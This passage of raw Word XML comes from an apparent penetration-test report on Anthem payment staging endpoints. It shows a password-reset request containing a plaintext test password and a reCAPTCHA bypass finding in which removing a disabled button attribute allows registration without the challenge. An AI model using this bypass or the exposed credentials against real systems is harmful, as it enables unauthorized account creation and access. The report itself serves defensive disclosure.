                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="732BE309" w14:textId="77777777" w:rsidR="007F691B" w:rsidRPr="007F691B" w:rsidRDefault="007F691B" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>gofundhip/resetpassword</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="75B1BFC3"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3F168078"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rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5D4B5355"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rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>userName</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">": </w:t>
                  </w:r>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2DC8D89E"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rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>currentPassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "tycqmod6",</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D2AFF17"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rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>newPassword</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>": "password 1995</w:t>
                  </w:r>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4588D917"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rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="641A3F62" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="007F691B" w:rsidRDefault="00914B7E" w:rsidP="00914B7E">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007F691B">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response 2:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="007F691B" w:rsidRPr="007F691B" w14:paraId="6C5E3B61" w14:textId="77777777" w:rsidTr="007F691B">
              <w:trPr>
                <w:trHeight w:val="1273"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="5DFE8BC2"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highlight w:val="yellow"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="094486AB"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rPr>
                    <w:t>Date: Fri, 31 May 2019 17:46:17 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="24EF04E5"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highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="009B9691"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rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6BEBF631"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rPr>
                    <w:t>Content-Length: 21</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="56509483" w14:textId="77777777" w:rsidR="007F691B" w:rsidRPr="007F691B" w:rsidRDefault="007F691B" w:rsidP="00D1715D">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>{"</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>changeStatus</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="007F691B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>":true}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="7618F79D" w14:textId="77777777" w:rsidR="00914B7E" w:rsidRPr="00914B7E" w:rsidRDefault="00914B7E" w:rsidP="007F691B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53237DE0" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A0CB73" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="7DA261D9" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1AA9C2C9" w14:textId="60E9B801" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00686BE7" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="_Toc10703667"/>
            <w:r>
              <w:t>H3</w:t>
            </w:r>
            <w:r w:rsidR="00983E25" w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t xml:space="preserve">Security Control Bypass - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00983E25">
              <w:t>Recaptcha</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00983E25" w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="42C11BBD" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5990B0F3"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EE14281" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:anchor="CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="002456B7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>7.2</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4D897409" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="05520971"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3740D71E" w14:textId="5E9C9AA6" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00686BE7" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00686BE7">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-603: Use of Client-Side Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0A40671B" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D356AD1"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="754F9CD4" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="007B53FD" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loginservices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/register/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>createuser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="15CCE653" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="63C03479"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5FA9F29A" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>By performing actions in an unexpected order, or by omitting steps, an attacker could manipulate the business logic of the software or cause it to enter an invalid state. In some cases, this can also expose resultant weaknesses.  This weakness is typically associated with business logic flaws, except when it produces resultant weaknesses. Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="124241F1" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70ACB299"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4C9D7B" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Issue a validation check that ensures the user has properly followed all required steps and security checks prior to allowing access to a resource or performing business functions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4C9A590B" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="12E86E41"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Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="79DA73D3" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="12BC9100" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5856CA58" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="007B53FD" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">By removing the disabled attribute from the button, a user is able to register a new account while bypassing the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>reCAPTCHA</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> challenge. This is demonstrated in the below </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>image and request/response snipp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ets.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="149D7986" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="784BBE34" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image Caption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>: Using developer tools, an attacker may remove the disabled attribute from the register button</w:t>
            </w:r>
            <w:r w:rsidR="008D36BE">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>, allowing for form submission.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CCCB765" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00556478">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53162D8F" wp14:editId="3644E829">
                  <wp:extent cx="4067175" cy="4919345"/>
                  <wp:effectExtent l="19050" t="19050" r="2857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125" t="9147" r="26474"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4067175" cy="4919345"/>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24A463C0" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51939038" w14:textId="77777777" w:rsidR="007B53FD" w:rsidRPr="007B53FD" w:rsidRDefault="007B53FD" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B53FD">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
